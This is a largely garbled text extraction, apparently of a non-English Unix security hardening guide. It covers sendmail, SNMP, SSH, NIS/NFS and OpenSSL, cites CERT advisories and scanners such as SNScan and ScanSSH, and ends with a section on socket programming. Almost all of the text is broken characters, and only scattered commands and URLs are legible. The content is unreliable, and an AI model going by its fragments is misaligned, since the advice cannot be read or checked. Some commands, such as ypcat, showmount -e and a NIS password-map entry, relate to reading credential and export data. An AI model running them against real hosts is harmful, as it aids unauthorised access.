R 4 S @ ?& $ 9
< ,6 3
5 CP
l ' &'(
sendmail
" ,
, ,F
-,
patch
*
- 5<
Echo\$z\usr /lib/sendmail- bt-d0
7Y ,
$
,
#4
F
sendmail -, <
" ?
sendmail -,< d *
l'
K
*
2
3@ "
6
@
, <
http://www.sendmail.org/current-releaese.html h @
! " %&
4 sendmail DY/ ) "
a
$
F
6patch 2 3@ " ) Z
*
http://www.sendmail.org h @ " ?
]
% !
? ,
X !
9
25
2 3@
source code
patch
I
F
- 5 sendmail *
-, < K % !
456 123&
•
*
'
0
#
'
" %/
- Y
5 - Y
?
$_package
0 5 GF
U
1 6
?@
Q
1G') - P I
e
'j 4 7
•
L C 5! sendmail
mail -, 6 U )
? !
# @
/] U#
)
daemon
)
6
_
,6 * mail
SL
? # _ –bd ˆK ? 5 T G' g]0, K5
T
#4
:
sendmail
sendmail
1/
2
< ,6 3
etc/mail/sendmail.cf h @
F l ' 62 <
F) ? `56l ' 6
# 4 % ' mail reliy
,
b
<( E
c 5G )
C
^P
# ) #1
P
5
,
0
- <
sendmail.cf $ ,
< (
#4% '
0
.
"
"
Z F deamon 1/
$
!89 +
" ?
:
2
sendmail
0
%
H
•
("c #
/ ? 596, < ( E
, #4
a 5 - Y
http://www/sendmail.org/tips/relaying.html
http://www/sendmail.org/m4/anti_spam.html
T G' g e
3j 4 ,
'j 4 7
#4
L open relay ? # sendmail 8.9.0 *
?@ C, E $ % !
6
? ,
- 5 -, < K sendmail *
$% !
-, 6 U )
- Y
(, !]
( E
X !"
" - Y 7
W
" ,G0,<
0, 5
L3 2
("c
TG'
H
_realying]0
("c$_ N
-,
? 5 ˆ K ] sendmail , ,F *
*
, $ 5 ,H *
b
-, < K
$ sendmail ,
h @" ?
,
#4
#4
" - Y ? "
6% ' u W L3
^P
7 K
&F "
("c
6@
•
,
0
0 5 - Y http://www/sendmail.org/m4/readme.html
download
)
- Y pgp signature "
9
"
" g@
6*
integrity
<R
Q
# *
?),
ca-2002-28 h @ " ?
?
" E " ? 59
< H
0 <- Y
3O *
" sendmail
F +
?@ "
/S
? "
:
2
•
#
I
# 2
$
("c :
5 sendmail
0 5
source code
sendmail
B5# 7 !89
2
'
6trojan
I5 0 , 5
, - 5 sigm
I
6, B0 5 - Y CERT advisory
-, < - Y
http://www.sendmail.org/ftp/pgpkevs/ h @ " ?
I 5 MD5Checksum "
a 5 - Y
sendmail
'
PGP ?, '7
)@
,
0
- Y sendmail +P , INTEEGRITV
"
!89 +
" ?
7 !89 S
http://www.sendmail.org/secure-install.html
http://www.sendmail.org/m4/security_notes.html
gshapiro/secu rity.pdf http://www.sendmail.org /~
Simple network management protocol
(SNMP)
6- N
5
SNMP" - Y
, # 4) ) - " y
#
I 5 ?@ "
0 <
SB
g
- Y
$T
-
1
)$
6Access Point$ 6ˆ K $ 6 ) $ N4
" $SNMP0 <
#P
<
- Y $ #P
<y
) SNMP
6N
,
6N
TCP/IP
G
- Y
SNMP %# ) 4 "
I
#P< 7) Y
P ' 4
6( '784 2
I K 6N
, ) ,
6N
6-
"
2 ( 4 1P
I5
' )
)Y
0, 5
"
PG ), K (& # ) -,< 1P
,G
* ]SNMP
,
-, < - Y
6N
I 5 -,< - Y
B %
6A)
6A)
! B
5F " $ 6 ( 4
bP
R4 S @ ^
b
6( 4
3
-, < K
(E
H$l ' R 4 S @ ^
, ) ,
I 5 -, < - Y
" - Y
# 4 _U )
6 A) " [
? 5F 0
? '
9
SNMP
A) " [
, G 7c L. ) - P ),. SNMP" W 3
,1 b
), K
:
6A)
- Y
R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ?
R4 S @ ^ 0
3
3
SNMP R4 S @ ^
0, <
7 K
&F - 5 _
6( 4
#4
% <&
*
$l '
? ,
" ] DOS \ " 7) Y 785/
SNMP
P 7 & E ) 7c@ 2<
-, < - Y
o
SNMP 5 , H
]
&
? G -,< &
$
SNMP 5 , H
6A) " [
N& S
6*
g’ V
6(
P e
%
! N "$
-, Y SNMP
5 i: j &' I 5 ? , , 1 "
< $h /
6-
^
$ SNMP
' )
!89
< TP,
I5
_?@
-, < % L
3 M, 6nH ) S
*
e
'j 4 7
T, " - Y
-, < K
P
6A) W L3
#P< 7 & E
" %
/f
%1
,
:
$"), )
F
2
- Y )
("c ,
G ) G
I 5P ^
u“
L 3 “7 L
3
) 7 !89 Z '
25F 0,<
,G ) TG' SNMP
5 SNMP
- 5< *
$SNMP
#4?
) ,<
- 5< *
d * SNMP0_, *
5 U#
785/ Q
$SNMP
-, < d *
U#
?@ - 5 ) SL SNMP *
U
T G'e 'j 4 7
SNMP , # 4
6
1) U#
% !
6
L $l '% # ) 4
SNMP
l ' R4 S @ :
$
P 785/ &1 @
,, e G
)-
6
- Y $ Bridges ) 6point access$ 6 N4
0
0
Q 0, <
^P
3 785/ &
c L. $ N
]0, <
“V
X !
] #P<
Q 0, <
K
6T, " - Y
,K
" ,G b
H$l '7 !89 " - Y
, 1
, 5
B!,
j & '
) 6
F
j , 4
R4 S @ ^
<0_, 5
O*
6( 4 , K
"
5 i:
L ? ,
H
6N
3 ]
6N
6 * 0_78#
- Y
R4S @^
PG
PG ) , K I 5
" $SNMP) )
<’
'j 4 A N0, <
6( 4 "
4 "
6A) " - Y (,!0, 5
<“
,
6*
P
5
SB
g
0,
#P
<% !
6
0 < ,6 3
=GX
6
)
X !
) 6N
H,, e G
R4 S @ d *
?
2
$ #P<
-,< %L
)
F
5 $ SNScan N 4
6N
0 5 - Y
)
SNMPSL
A)
P
) #5
- .
I5
"
h @n
0
9"
5
("c
7,
-
?
$
?
,
2
E F$?
F) N 4
0
I 5 ("c 7 B
5!$SNMP "
1 ("c
"
http://www.foundstone.com/knowledge/free_tools.html
'
W L3
@?
6 & " - Y ?#
(E
:
2
SNMPZ&F ) SL
7 L
- 4- ."
0
6 @ " U4
GF
9
SNMP?
(E
#
% !
T G'd *
2'
5
'
2
F)0
(E
w•w)w•p 67 4 )
("c 7 K&F "
6 @
I5 0
b <"
6"
F T/ “SNMP“
R4S
B1$ SNMP
@
0 5 - Y CERT-2002 03h @" ?
# n. 7
a < ,6 3
? G -, < - Y
] 13
W L3
$SNMPSL ) "
H,, )S @e G
F)•
'j 4SNMP Community
)e
_ P
!
")
F)•
community SNMP Y*
F)•
6 <
DY/ - .
$ l ' R4 S @ : %
DY/ I 5
0 5
a-,
,, )?
P@
?@ " - Y 7 ) X (,! 7
N& ) 6( 4 , K
I 5 $ SNMPv3
6
3
6, "
%
DY/
SNMP ? 5 TG' g•
P
T,
" - Y •
_? # 7
-, < K patch *
j*
?
$? ,
2 3@
$)
, 1 7 L*
6&
h,/ % H SNMP coomunity
R4 S @ : %
D Y/ 7 , H ?
4
*
"
6 @
] 6-
SNMP " - Y 7
S L $-,
•
,1 b
0 5 GF $ CERT Advisory CA-2002-03 5 5X
)TCP/UDP
,
^
w•w7
4], K5
SNMP agent
K6
9
),.
!89
SNMP
3
b
3
,
? &
w•p7
4
6N
"•
T
2#5 l ' J)0
("c T
$U#
B'T)
' " - Y 0
,
^
P
A R 4 W L3
? 5 V8
SNMP•
B
F) F 3 7 L
lYB
5! ?
y
6
6-
SNMP agentb
6
6
3
$
)
6
) TCP-Wrapper
P
(E
6
% !
agentb
) )
l '7 B
5!0_TCP/UDP
) X #
0
- Y
B' #P
<
?
6
1
)$,<
Q
0
(E
( E xined ,
& ?&
#4
agent
)
0 < +H ) [
h,/ % H
DY/
SNMP? 5 TG' g•
?@ " - Y 7 ) X (,! 7
I 5 $SNMPv3
N& ) 6( 4 , K
6 < %
P
" - Y •
T,
_? # 7
I5 W 3
"
$)
("c
2
0
- Y _
- ),.
)
) 7 L )-
)
( #.
6& ? G -, < - Y ] community
P!
h,/ % H g
& )
0
@ 3" ?
,
O*
u&
("c
:
2
0
(E
N
"W 3
6
F 7 # " - Y
•
P
!
6&
-, < '
- Y $http://www.sans.org/resources/idfaq/sanmp.phph @
) TCP/UDP
,
C
'
W L3
•
SNMP " - Y 7
*
0, < I
] 6-
^
w•w7
4], K5
B' ,
) )
6-
l '7 B
5!0_TCP/UDP
) X #
y
B' #P
<
# 40
(E
0, 6 ( E $-,< &5
$
,
-,< K
SNMP•
B
^
w•p7
F) F 3 7 L
6subnet 2 SNMP " E
'
4
6N
I5
SSH
(Secure shell)
% 'T
F$Login "
)7
l ' * ] OpenSSH
&'(
25
" U#
P
- Y $SSH Communication Security
R-
) telnet$ Ftp
6
,G
P
6=GX$ -,< - < *
&K/$ ? @ "
,
,G ) -
,, 2 5 0
b
_
U)
$l ' R 4 S @ :
_U
:
F
6=GX Q 0
F)
)-
56
?# $SSH
" - Y
N5
6=GX
,<
F
-,< K 7 !89 Q $"), )
] nix*) "), )
1
$U#
0, 5
Command
P B '8
i: ]
#P
<
SSH #
? `56 1
)$,<
K
&F 7c #< C
'
)? ,
(, !$
6
Q0
)_open-source 7 L
5
( ,H ? @ ? 5 M 9
R 4 S @ 2<
? ,6U)
)
6
E *
P
$SSH
5! U )
bP
0
?5F
SSH
6b.
SSH-, < "
- 4
6*
SSHS
%K ,
( N ) 6Patch
$("c "
# ) , #4
0,<
,
^P
< TP,
C L3
3 W 3 78#
)
SSH2
K 6% # ) 4
&
) HTTP$U )
$telnet
-, < -
-, 6 U )
…-,
^ P
C
$_ SSH2 SFTP
U)
L3
A"
R4S
4
Kc
F) ?@ ? #
2
#
"
@%
W
SSH2) SSH1
], < ? # -, 6 U )
) -,
4 (,!
3d *
6 *
R4 S @
, 5
6 &'(
F
" , G
$OpenSSHb
&
<
- <
# 2
6&
) clear text 7 L
-,
L3 2
U)
P
I
$ SSH1 % # ) 40
H
session
&
SSH2
#
)
0_
OpenSSH
"
2&N F , 5 ,H]POP3
? , % 1 2 , 0, <
],
N, #
@^
6A) a I ]rhost
6sessionS
% # ) 4 " - Y $ #P< )
:
R 4S
;! _rlogin) rcp rsh$, K
7 !89 T
)- P
d *
("c0_
SSH *
("c
F) & Z Q
OpenSSH ?
-,< E
6%
4%
CERT
2002-23h @ " ?
$ 9
l ' * ] OpenSSH " - 1
@ *
I 5 0,
7 K
&F "
6 @
pqqp T
0 5 - Y Advisory
) ' 6S @ ;! ) A
%
3
6
? "
R 4 S @ (, ! " ? 59 ) :
I 5 0, <
trojan-horse
_
2
7 !89 S
- Y http://www.openssh.org/txt/trojan.advh @ " ?
$l '- 1
@ *
0 5
,, e G
-,< K
* ]?@ " ,G OpenSSH 3.3 ?@ )
U
) SSH Communication Securitys SSH 3.0.0
% !
6
1 U#
*
6
)_version 3.6.1$pqqp T
Z F ) S L _version 3.5.2- 5 < pqqs T
-, < K
0 < ,6 3
* ] ?@ " , G
HS @2 e G
$
R4 S @ d *
*
R4 S @ W L3
-,< SL
U)
*
("c
- 5< " $“ ssh-v“
) - " d *
6*
$S
N 4
?
:
2
& $ ScanSSH0,
Patching (,! % 1
,
0,<
- 5< ^ P
ScanSSH *
" - Y
0
#P
< 6h @
2 3@0, 5
K
4
6Z
0 5 SL
?@
http://www.monkey.org/~provos/scanssh/h @ " ?
'
a
Patch2 3@
)
R4 S @SSH? , 6
! " %&
0,
(E
- @
< &) j 4 ? , 6 U )
-, < K pqqw T
0 5
F
I5 , Y
1
$ ScanSSH :3
"
?
- .
F
"
*
$l ' R4 S @ : %
2
3@
?@ )
0, < 2t5: ?@ *
'
DY/ I 5
)SSH *
- 5 OpenSSH )SSH #
$,< -,< SL $% !
)
openSSH
456 123&
% !
-, 6 K
"
9
2 3@ SL " $OpenSSH" - Y 7
•
SSH1 G
:
0,
0,<
? ,
-
*
P
,
TL ) I
-
*
6 & "
6
-, 6 U )
S!
5 $" E ?
!
j &'
0
6A) $?@
I5 ? @ " ?
, # 4•
U)
S
2
0, 5
U)
N 4
)•
W L*
,K
, #4
SSH? ,
2#5 -,
"
I 5 0,6 d *
,Y :
5
5/
rsh
2
NO , $SSH , # 4 % ' FallBackToRsh, B
P
-)8! S
,6 3
- 4 *
)? @" - Y
6 ) ?
- Y O B
:
2#5 $DES3A) ]
L
F
TL ? "
2`
7
3 5L -, @
), . ? # 0, 6 ( E
0
0
F)
$SSH-,< "
6
2<
" - Y )
) <,
! 5E
F
6 & "
SSH
SSH2 G
I
# 4,
G ), 51 /•
SSH2 SSH1 * $
Z
- Y DES3%
2, 0_,< -,< '
3
P
( #.
N& " •
blowfish
I
9
*
" & -,< ( E
e 'j 4
N& $ 7 B
5!
+ ,I
!
+
; Q
NIS/NFS
) $(Nis)Network information Service)(nfs)Network File System
U)
Sun
) $ NFS0, <
<b
#P<
F
) V < ? # l 'U )
6 '• &
6
6
2
" - Y
7) Y
6
% ' I
,
6% ' Q
)
u T 5! ? # $NIS & 5
maps]
7
u T5! 7 ) X (,!]0, 5
?#
^
6% 'V
0
-,
) L*< 6
$ nis0
7
U#
6 #P
<
I 5 Microsystems
<
"
-
)
4 ) / 9$U#
F
2 % 'V <
,
6% '
A) $ NFS0
,
-,< +"
, 0, 5
-,< - Y
!89
U)
6 'hosts)passwd
6 '_ !89
] :
7 !89 K $NISM,62 5 0_ #P
<
"
F
6
I
6
5 group)passwd
?
,K
& 5
=GX C
8Q]
NFS I #P< 6U )
B'0
I5 ? @ "
,G
? @" ,
?5F
3 ?1
,, e G
6
"
H
NISb
I K6 &'(
" - Y
I 5 NIS
"
(& # 0
? 5F
,K
) 6, "
0,<
dos$buffer
S
', 6? G
F
6- Y/ " - Y Z
-, < - Y
- Y
patching)NIS)NFS 6U )
$S
F
6
0
_?
F
3 785/
, 63
) -
!89
)-
B
. 7
3W 3
F -
?5F
S
6=GX
)
?
H ypcat
j 5
P! &
$() *
- 5 U
0, <
1) U#
NFS )NIS
"
+,
6
5 CP
TG'e 'j 4 7 L $ l ' 6U )
+
6U )
:
,F
) ) -
0, <
K NIS)NFS " *
-,
"2
(E
R4 S @
0, - 5 - Y
6U )
)-
\ " -, < ( E 785/ Q 0, -,
# 4 (, ! 7
% '
$NFS)NIC
56? 5F $ l ' 6U )
, K
6maps]
_ I
6=GX
, G 785/$ ? @ " - Y
overflows
-
_ <
0,
! ". /0(123&
R4 S @ d *
I5
a
K6 *
5 0-,
), , e G
,1 b
,< -,
-,< K
SL ? @ )
F patch 2 3@
" - Y
NIS *
I 5 0 ' 6 @ -,< SL NFS *
j 5 &
NFS *
6@
- 5< l '
•
patch 2 3@ SL " ? 59 )
rpc.mountd-version
- 5 <"
4
6*
Q
) -,
(N
0 < ,6 3
HS @
- 5< " ?
] 5 - Y ypserv-version
" ?
0_
,6 3
(N
R4 S @ ^
0
R4 7
N
4
" ?
$ &'(
, ,F 6=GX W L3 , "c
a
4
NIS map
?
2
0 F
P!
a
4
NFS S
6" E ) netgroups$?
% '
& ?
7 L -,<
3
I5
, N (,! " ? 59 •
6&
" •
I 5 cracker
"
-,< = G
6& ( #.
"
5
, # 4 (,!
password root
6
0 5 - Y $-,< = G
- Y
NISS
"
I5 •
R4 S @ d *
P
!
, # 4 (,!
( N W
L3
3
I5
("c
•
etc\exports\.
) -, < export
"
! -,6
I 5 showmount e
F•
0
?@
6
R4 S @ : %
4$NIS , # 4
a
" ("c
N 4]? ,
U)
NIS? , 6 U )
)
0_NIS -, 6 U )
-, 6 U )
67
S
2, 0
4 n 9 " ) -,
- Y makedbm
^P
"
? 5 d* •
i
? G 6
TG'Yp-secure
U)
DY/ - .
6I W L3
J)$ DBM 6% ' E ? "
b
1
- 5 S ˆK " ?
6
:
2
3
0
•
C
'
,6 3 v 4$" E
0 5
-"
/var/yp/securenets
4b
6 #P< )
U)
a
%
)
?
+:*:0:0:::z •
password map
4 NFS , # 4
^P
-
-" F etc/exports % ' ? ,
U)
"
6h @ " - Y •
qualified domain names]fully_FQDN ) IP ,!
0_ <
& z •
- Y ypxfrd) ypserv 6
0
NFS ? ,
5!
#
"] G
- Y $ NFSBug (
0, 5
" ?
K
,
,
#4
I5
!
I5 •
#4
7 # l '
0 5
$NFSBug
" ?
'
0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @
% '
:
I 5 etc\exports % '" - Y •
),. T5!
a "
25
? )&' NFS % '
4
U)
mounting "
15G ?
domain (
^
4 ? )&' NFS
6
G5 …
) IP h @ " U
4
home10.20.1.25(secure)a8Q0NFS -,
? )&' ?
^
l '7 B
5!0 S
IP " U4_2< ) ?, 3
0
NFS % '
6" E
rw
)
? 5 export …
ro]("c
, 3 b'
( E etc\export % ' NFS -,
U)
6" E
domain (
./ro)10.20.1.25 homeC
8Q
^
Domain ( ) IPh @ " , G root_squash
superuser $, < -,< TG'l '
NFS -, 6 U )
)
4 #
H$ -,
U)
- Y NFS? ,
0
ID nobody
4 "$ ?# 7
NFS -,
U)
user root S
)
0
…
U)
ID root
)
2, 0
2&N F
, 6 * root )
6% ' u
root_squash/.)10.20.1.25 homeaC
8Q
?
l '7 B
5!0
0
TG'7 4 y
4
% !
4 NIS ) NFS
5 ?,< V8 " ? 59
^P
I 5 T) ' 6
•
n 9" C
”
'
"
)
(_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C
8Q]
U)
)
( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&'
a
67
$U c
$ NIS)NFS ? , 6 U )
N" •
) X
?#
0 <( E " E ? ,
g
0SSH• I 25 % # ) 4
2
NFS" - Y W L3
)
•
("c
0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ?
NIS ? , 6 U )
,
# 4 ) SL
Z
)? ,
^
,1 b
-,< K
6 @
0 F
7 !89 "
checklist UNIX h @ " ?
$=! >
5 SL •
6patch
*
%K
:
$ NIS)
2 3@
? 5 m .1 U#
0 5 - Y security
d *
K6
W L*
deamons
)
("c
N 4
0 5 MR/
, K ) / 9 NIS )NFS -, 6 U )
I 5 0, -,
) "
NIS ) NFS? 5 TG' g•
^
6 )]NFS ) NIS
_?@ )
6U )
?
Layer open secure sockets
(SSl)
? )&'
H
I5 f
^ P
N, #
l 'f #4 " -,
(E
N ,G
#P< n 9 "
- Y
6
open source 7 L ]openSSl
&'( $_
2
K6
-, < 1P 7 !89
j &'
?
^P
, 5
4@ -, 6 U )
SB
g
? 5F 0, 5
"
openldap,cups,maila
I
OpenSSl0 < , 6 3
a 5 - <? @
H$ l ' R 4 S @ ^
N
H F
5
" - Y
0, <
2
,G
e G
5
openSSl
- Y openSSL
,G
$(
*
# 0,
- Y
-
?5F 0(
openSSL
5
& , 5
?
$ openSSL
M, 6"
0,
6
- Y openSSL
6
25F
6
#P
<
I
3 785/
$ :
u 3
3
K
O*
"
H
a, 5
5/ I 5 ],<
openssl " - Y $ 7
I
N&
H M, 6%
- Y openSSl "
4@ -, 6 U )
^ P $hhtps "
0, -
" connectionn
N&
3 <) 2 5 $
0_‹‹s 7 4 )
*
R4 S @ ^
$()
$T)
? G - *1 ,
,, e G
% !
6
F
) openSSL 0.9.7 *
?@ )
U
0 < ,6 3
1 ) U#
HS @2 e G
6
"
$
6
F ?@ " %P
H
R4 S @ d *
,, e G
$,< -,< SL ?@ " % H
I 5 $ openSSl version
" ?
) versipon 0.9.7a *
:
2
0 5 - Y $-,< SL
#
0 < ,6 3
&'(
*
H S @)
- 5< "
R4 SP @ : %
a
4
"
- 5 OpenSSL #
9
*
2 3@
9
% !
%L
0
I5
"2
F
6 &
openSSl -, 6 U )
)
•
?@ ) '
•
) ipfilter" $? # 7
K6
<- Y
Z
, 1 " $,< -,< SL % !
0 5 SL
T 5!
DY/ I 5
2 , ,F ) 2 3@
-,
6@
DY/ - .
$l ' R4 S @ : %
$ openSSL *
- .
:
), .
$,
Q2
gN8 3(
2& &
Socket Programming
K
&F ? G ) ( E % !
Unix % Q
6% !
?
,
u
0 <
F) M :G 2
@
TCP/IP – B
#) 4 "
6‰ 9 b
bP
S L ) K ?@ - 56% !
h
?@
IP)TCP
B
#) 4
SB
F Linux % !
- 4C
c 5G
2
?,
Windows
%
6
"
6N
"@
H8! I R1
6b .
%B
.)
0
N C %Q
@
, 6,
b.
u
,6 * U
) -
?)
-, < = D U
/ 9
<
b.
#
= G
c
•
A 3
)
) W 3 # ) #1
C5
6
2
‰9
6Y
.
, U
BT
6
K6, $n5! ,
GCC F
2< ? "
c
.
K %L'2
,
• ( Y ) #P<
TCP/IP% # ) 4
i
.
e ' , 5 %
<@ #P
< .
H
7
-J) 7 #
G(
0,<
e 'T/
% '
,
2< A) -
0, 5
%L'2
0
b.
4 b.
1Q ) 6
K 2 `56)
) Linux % !
5
63
6C? "
,
, <
0, -,< 5F
,63
PE
.
( Y2
.
(
6
^P
'#< ,P
1
" g@ : %L'2
0,
#P
< .
Y(
H
?@ ( Y ,
(5
I
%L'2
c
,<
6
P"
U#
(5
% !
) ,< \, 6 ) 4 2 -
/
y
?/ 9 b
? F T P) #P
<
0
% '
7
b
B'"
) N4
,
&
(I/O)
6 F) 3 )
,
5 6Y
", -
6U#
5 <, < $,
3 @
T,
• , < -, <
) )\
,
)%
% '
b.
B
5F 2 5< , <
! ( 5 •0 < T, )
7
@
L
N4
#
B
% !
N N)
(E
"
,
T /2 !
)-
7 B
5!
3
,
$2
k
a, 6,
(Read Only)
< b' B'7 L ?@
,
(
_ fopen()
- <? !
% ' L*
% ' , 56
N4
open() 7
% !
&@
_=1
] 0,
' %P
H B
/
"
E
_O
0,
2<
15G 7
0,
?56
, <T
N4
$_ fwrite
%PH B
/ " -,< " % '?)
_ fclose()
? ! ˆ6
0
)
)
("c 2
-, !
2<
close() 7
U
0 ,< ,6 *
B
/ ,
j 5 .Y % '( ,
H
4"
] 0, , P % '
( 5 " U4_
256 < ( E ,
B
15! ) N4
* ? G N4
", -
#
H- Y
0 , 5 T, % '? !
# ), ,
F) 3 )
=B*
a, R
"
6N
B
/
?@ " ?,
3
j 5 .Y
6N
#
U
B
5! ( 5
,6 3 M Y< ) -
)? #
@0
(5
H U#
< b'
B' N4
, 3 b'
, 3
B'T
< )
< )
, 3
< )
7
, 3,
F
,B
B'-
B'U#
I/O \
L % !
a
6
5< $
, 3
B' *
, 3 b'
(con)
I
) )
6- & ,
< )
3
= D) 2
0 < '
2
_z
]% '
C H ,< 'G N4
b '$
6-
write() 15G
k ) ", -
% !
,
)
% '
'
b.
6
' R4
?
…
B' N 4 …
? G j 5 .Y …
B'T
7 4…
)
GH ) % ' …
)
GH ) % ' …
11b3
FIFO =
…
# 2 5< 26• T/
T, ) X ! % H
,
% '
F) 3 |
) )
6 ) ?@ 2 7 !89 1P ) #P< )
) ^P
@
€ , (I/O)
)
) 2 ^P
- N@ 6,
5G
#P< ^ P
a
•^ P •
]
H
'
2
T 5G nP9 7
) -
0,
2
N
g
‰8:
),
?)
"
IP h @
) _d *
,
,
•^ P
socket() 5
˜4
g
- <
- <•
&@
$,
,
$
&@
0,< ,6 3 - Y
- <?
6 ' ^P
' 7
3
,G
I
)
#P
<
6-
,
6-
1P 7 B
5!_z
,
SB
9% !
0, & ,
3 '
1P
( ,H [
1P
7 , ?
1) ) +
_O
?@ "
6-
' %5!
P
(Null) —14
5<
% ', 56 ^ P ,< ( 5
+
7 4h @
5< % !
0, 5
"
6
6 '_d *
%5! ?
read() ] rece()) [ write() ] send() +
_=1
]W 3
,6 3
?56 $%P
H B
/
6
3
% ' - <
0,
% '
" T)
b < ,6* % !
?@ ) W 3
& @
' R4
% ' 3
3
?@ "
•"
N
•" -
62 " U4
) TSAP : ) 2 7 !89 1P " ^ P
)
0 ,<
) )
?
" , /)
% '2,
#P
< .
6 )
$, 3
6^ P 2 "
6 L*
@"
? &56?
B', 56CH
< _% ' - <
]
) < " ) TG'^ P 2 ,
0
(E -
@"
? &56 :
1P
@ " (,
@ 6Y )
0
,
F)
\ )
a ",
P
!
'G
\ ) 2 _0 ,
0 <
-,
N1L
\
6
56 I "
56
1
),
66
6
#5
\
\
6*
N \
]
6
…
0 <
6 Y 2 7) Y $
\
-,
TL ?),
\ ) 2 ( Y2 &5
6
T
A) 0, 6,
' 7 I
2t
5: ) S
N` 6)
2t5:
!
(
6-
2
\
. )
P! ™Y/ , "
$ (FTP) % 'T
%# ) 4 TQ ? G 0,
TCP A) ?56
(SMTP)
# ) #1 6
T
-
\
" C
GP
9) ,
1P 15 /
F) 6-
5>
K6%# ) 4 ) 7 ,3 Q
? FS
! 2 `56) 6
(HTTP) 2
%# ) 4
6:3
? FS
c
6 6-
7 !
UDP ) TCP \ ^ P
0, <
, -,< = G (
…
) j4
)
,
\
,
H I,
0
-
(
7 .Y T
62t
5: ^ P
H
%# ) 4
, "
N56
0,
"
13 ) S
!
) 6
TCP % # ) 4
0
H
) ^ P ˆ6
.
%Q 6
H
"
$ 6-
?,
"
3
A) 2 2 /
0
P CH
B
/
\
#
A)
5> 2
6" 78#
(5
TL
F) 6-
)-
,6 3
,6 3
(8! % !
+ ) >' ,6 3
i:
6-
" - Y
% !
^ P = G"
1P
" UDP
0,
S
6-
0, <
)
$TL
2 5>
L ) ,
0 ,<
&
1P "
\
1P 6-
,
#P
<
6-
P(
DNS
H- Y
TCP 6% # ) 4 " - Y
)
,
), <
1
)
1P :3
0
UDP %# ) 4
?), )
N 56
IP %# ) 4 ) , 5
+H ) ?@ 2 " c
%P
H CGP9 ) -
) 6-
B
# ) 4 TCP ,< - < C
8P
H
6-
<
T
T
!
5<
/
UDP
3
!& ( Y
3% 5 C
85!
= G U
TCP %# ) 4 7 K
&F ?,<
E $^ P
H
F
?),
"
| -, 6 U )
( Y
G ,<
'9 )
9P
\) < I.1
"
6
F % H
^ P 2 ' 9 R 1$ <
# ^P
6
^P 2
0, < -
0
%
,6 3
= G
(8! % !
š7
^P 2
6-
<
#P
<
) 4) 2
6-
M 9)
R4 ?#
# 2
^P C
85!
1P
3% 5
YB^ P -,
\) < $2 '9
1P $^ P A R4 7
C, ! H
•
•
0 ' ,6 3 (
•-, 6 U )
0
^ P -,
•_-
\) <
?@ I ) ]
a
0
2
7 !89
% 5 )
@) ),
SB
9
, , "
R4
R4
5! = G
) 4 Client
c
C
) 4 Server -, 6 U )
3
!89
, /) $ X
task , 5
I
)
RN V <
7 !89
0,6, % .
I $-
7 P!
I T /2 !
-
)-
?
)
3
F
3
O) -, 6 U )
O) 7 .Y S1H
) )- 5
<
SL -, 6 U )
?@ A"
-,
4 " U4 )-
2<
'
\) < -, 6 U )
H) TQ ? G
!89
7 .Y 2 "
0, 5 T
)
" 2*
X
X
2
)
5
v 4
("c
-, 6 U )
^P
H
B 1/
2
P
5
X
, 5 T
I
S
v 4$X
0
7 !89
3
$"
) ,< ,G ,
2<
;.
,
)
-,< +"
6
5
6
/ 7) Y
<
)
N] 0
6
^P
%
M 9
,G 0,
6-, 6 U )
,G C
c 5G 2# 1
_0,
) N* 4 $7 !89 S/
,
*
H
-,
,
T
I
Y
, N I
N M 9
–
…-, 6 U )
5 –, 5 T
* 4)j
N
;.
5 …
4
B
F TQ
T
\X
I
:
-, 6 U )
0
5
3
,6 3 7) Y $ <
%
$
a
% !
b'
\ % !
% !
,
b.
F $
0,
+ b
(5
2 0, 6,
,
-,
6^ P
?
6X
A R4
I
' % <+
6-
) >' ,
TCP ^ P
Q ,/ ,
6X
4
E
"
< A)
2 G Q ,/ ? G % !
,<
( E bind()
) TCP
TCP
5
6
6
$
"
5
,<
,G B
/
_z
2 0, 5 \) < TCP
,< ,G ^ P
A R 4 (8!
,
'
F
)T
) -, < ' R4 ? &56
, "
U#
_O
<
(8! % !
b
^P
^P
,6 5<
( E listen()
G
)
" - Y -, 6 U )
,
3
+ b
( UDP
4 - 5< UDP
A
(8!
"
/
4h @
, 3
, -
0,
,G 2 G C
c 5G 0,
< A"
TCP )
<
)
A R4
TCP 7 9P
-
/
&1bind()
2#5 ?
3
2
_=1
= G, "
4h @
7
5<
L*
2
'G W 3 7
,G
#B
3
H ] 0, _0
^P
P 7
5
5
( E Socket() 5
- 5 < ? <,L
R4 ? G
<
^P
(8! % !
: 5< I
-, 6 U )
'G ( UDP
2 0, K5
) # @ " %P
H
2 `56) -, 6 U )
"7 B
5!
0 <
5
1
5
0, )
( Y
F T/
›
(E
B
/ 2 56
|-, 6 U )
5
,6 3 , "
E
,!
F
N1
a K5
,
5
6X
H 0, N
("c
>'
:,
,G 2 ,
1
)$
5<
0
7) Y ^ P 2 ,
T G') " 7
,
L
L
$? &567 L ,
7) Y
B' , G
"
<
-, 6 U )
)
2,
)@
6"
7) Y ^ P 2,
Q ,/ ,G % '
0 < " ? &56 : 5<
? G 0,<
b
,
<
]
nB
G 7 9P "
,
X
" accept() + - Y
% !
Y D 7 # accept() + 0,
% >Y
'G 5<
C
_
_ F) 7
0,< ,6 3
0, K5 - Y
0
,6 3
5
recv ) send 7
1P
R4 ?# A) )
2 0, 6, 5 3
_ close() + b
] '
_ shutdown() + b
] '
)T
_-
^P C
_)
'9 ) ^ P +:H …
7 B
5! "
# ':# +:H …
a < T5!
% !
b' E
0, )
F $
^P
0,
P 7 4h @
3
U)
^P
-, 6 U )
H
, 56
-,< (8!
("c ,G B
/
,
F) bind()
" - Y
X
A 3 #B$
? N " ^P
connect() 5
?@ 5
_=1
6^ P = G , "
-, 6 U )
5
L*
_O
)&1 G , 6,
+ " - Y
X
X
I
?@ , ,< -, 6
0,
TCP ^ P
0
H
9P 2
TCP 7 9P
5
_ Hand Shaking]
B
/
( E ) \) < 1 C
85! connect()
R4
<
2
M 9
1
),<
0
( , H 6-
H
'
)T
'
G
'X
$
&@
ˆ 6?), ,
%/
$, <
" bind() + "
- Y
,6 * ("c
TCP ^ P
#
^ P -,
Y
<
,
93
C,E
3 7 4 - 5<
\) <
' connect() %5!
)
-, 6 U )
0, 5
0, 5 ( ,H 60, 5 +:H '9
'9 ) 7
'
T
shutdown()
send() ) recv() +
close() +
" _z
